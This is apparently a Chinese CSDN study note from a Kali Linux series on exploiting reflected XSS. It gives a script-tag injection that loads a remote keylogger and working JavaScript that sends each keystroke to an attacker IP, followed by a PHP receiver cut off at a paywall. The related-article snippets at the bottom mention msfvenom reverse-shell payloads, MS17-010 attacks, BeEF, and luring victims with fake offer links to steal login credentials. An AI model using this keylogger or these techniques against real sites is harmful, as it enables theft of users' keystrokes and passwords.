kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser

最新推荐文章于 2024-08-22 22:20:04 发布
最新推荐文章于 2024-08-22 22:20:04 发布
阅读量473 收藏 1
点赞数
分类专栏: xss和csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43239236/article/details/107476822
版权
本文介绍了XSS漏洞利用,特别是键盘记录器的原理和实施方法,通过启动Apache服务接收数据。同时,讨论了Xsser工具的使用,包括如何绕过服务器过滤和不同安全级别的应对策略。
摘要由CSDN通过智能技术生成

原则上:只要XSS漏洞存在,可以编写任何功能的js脚本
反射型漏洞利用

键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上

服务器:kali    客户端

启动apache2服务:service apache2 start
在这里插入图片描述
语法:

<script src="http://192.168.1.127/keylogger.js"></script>

keylogger.js 键盘记录器 需要修改里面的接受地址

document.onkeypress = function(evt) {
   
        evt = evt || window.event
        key = String.fromCharCode(evt.charCode)
        if(key) {
   
                var http = new XMLHttpRequest();
                var param = encodeURI(key)
                http.open("POST","http://192.168.1.127/keylogger.php",true);
                http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                http.send("key="+param);
        }
}

keylogger.php  【用来接受客户端提交上来的数据】

<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite(
最低0.47元/天 解锁文章
唐吉可黄
关注
专栏目录
kali安装keylogger_小白日记48:kali渗透测试之Web渗透-XSS)-漏洞利用-键盘记录器xsser...
weixin_29344293的博客
12-24 646
XSS原则上:只要XSS漏洞存在,可以编写任何功能的js脚本【反射型漏洞利用键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上服务器:kali    客户端启动apache2服务:service apache2 start语法:keylogger.js1 document.onkeypress = function(evt) {2 evt = evt || window.event3 k...
kali键盘记录
jhbgvk23的博客
04-20 3490
键盘记录
kali渗透内网和外网
最新发布
dzqxwzoe的博客
08-22 994
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录
weixin_42412910的博客
05-15 488
环境: 攻击机:192.168.200.101 //kali Linux 2020靶机:192.168.200.103 (未打MS17-010补丁windowsServices2008.x64)1:msfconsole //进入me...
kali渗透测试之Web渗透-XSS-漏洞利用-键盘记录器xsser
hacker3062的博客
09-15 415
进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如】)】{可用burpsuite进行编码}-v:显示详细信息;–heuristic  探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}  【所有过滤机制都是基于字符过滤】伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码。可使用图形化界面  xsser --gtk  【不建议使用,界面不够友好】:将对应页面和参数写进**-g**参数中;
kali安装keylogger_Kali Linux启动Beef-Xss漏洞利用框架教程:
weixin_35515918的博客
12-24 375
注:首先将默认浏览器的IP地址设为本机回环代理地址,IP格式:127.0.0.1,Port:8080,勾选Socks5,勾选Remote DNS,设置完成!root@kali:~# cd /user/share/beef-xssroot@kali:~# beef-xss注:开启后自动跳转到Beef登录界面,链接:http://127.0.0.1/3000/ui/authentication,默认用...
Kali Linux渗透测试 099 自动注入-Xsser
kevinhanser
03-26 3279
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 命令行 root@kali:~# xsser 图形化 root@kali:~# xsser –gtk 2. 简单使用http://10.10.10.132/dvwa/vulnerabilities
基于内核的Linux键盘记录器 2.6.24 x86
01-30
基于内核的Linux键盘记录器 内核2.6.24 x86 ,完整源代码,供参考学习
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3246
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
kaliWEB渗透笔记
fhl5203的博客
11-01 5216
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
【安全牛学习笔记】​XSS- 键盘记录器和反射型XSS
edu_aqniu的博客
09-30 1105
XSS                         Keylogger.js  document.onkeypress = function(evt){      evt = evt || window.event     key = String.fromCharCode(evt.charCode)     if(key){         var htt
XSSer:自动化XSS漏洞检测及利用工具
09-04
XSSer:自动化XSS漏洞检测及利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测、利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
闲谈:渗透测试-红队版
weixin_43896582的博客
04-27 8801
闲谈:渗透测试-红队版第篇Blind XSS漏洞反序列化攻击JavaScript 和远程代码执行服务器端请求伪造(SSRF)XML 外部实体攻击(XXE) 第篇 短短的一生我们总会失去。你不妨大胆一些,攀一座山,追一个梦。 Blind XSS漏洞 见字知意,正如攻击的名称所表示的那样,攻击者/用户看不到存储的 XSS payload 的执行(无回显),只有管理员或后台员工才能看到。易被遗忘,可...
kali上的xsser安装教程
2302_76986722的博客
09-10 1062
XSSer是一款用于测试和利用跨站脚本漏洞(XSS)的工具。
Kali linux 学习笔记(五十三)Web渗透——XSSer 2020.3.30
闵行小鱼塘
03-30 2525
前言 本节学习XSSer 一个用来实施XSS的工具
xsser建站
Leon~博客
07-29 1696
一,下载源码  链接: HTTPS://pan.baidu.com/s/17bwk0yn5amNGKhTV6fRfxg   密码:hi6x 下载之后解压出来会有这么些文件 把这些文件复制到网站目录xsser,配置环境 步骤:  如图1所示,修改的config.php文件中的文件的文件里面的数据库连接字段,包括用户名,密码,数据库名,访问URL起始和伪静态的设置。  ...
渗透测试工具:跨站脚本漏洞检测---Xsser
gao646467783的博客
01-27 3761
文章目录简介:用法:(一)、Options:()、特别的用法:(三)、选择目标:(四)、 现测HTTP/HTTPS的连接类型:(五)、 配置请求:(六)、 系统验校器:(七)、 选择攻击向量(s):(八)、选择Bypasser(s):(九)、 特殊的技巧:(十)、 Select Final injection(s):(十一)、 Special Final injection(s):(十)、 混杂模式:(十三)、 Reporting:(十四)、Miscellaneous: 简介: 跨站脚本者是一个自动框架
xss漏洞工具 -- xsser
weixin_41489908的博客
01-02 3509
深情的人一般会被嫌幼稚,懂事的人一般很穷,于是便把深情喂了狗,把懂事换了柴米油盐。。。 今天给大家介绍一款xss漏洞利用工具:xsser 一、环境:kali19.4 python3 、安装过程: 1、复制到本地安装包 git clone https://github.com/epsylon/xsser.git 2、安装依赖 cd xsser python3 setup.py install ...
小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具
ZiXuanFY的博客
09-22 4825
渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1、上传各种工具 2、提权:为了全面控制目标系统 3、擦除攻击痕迹:防止管理员通过日志溯源追踪,发现攻击源头【除了系统日记,应用程序也会有自己的日志信息】 ##删除系统日记和应用程序日记 例如:SLmail中 4、安装后门程序
web安全之kali-xss-beef剑心哥哥
12-24
BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞的工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux中结合使用XSS和BeEF可以实现对网站的全面安全检测和攻击。 “剑心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值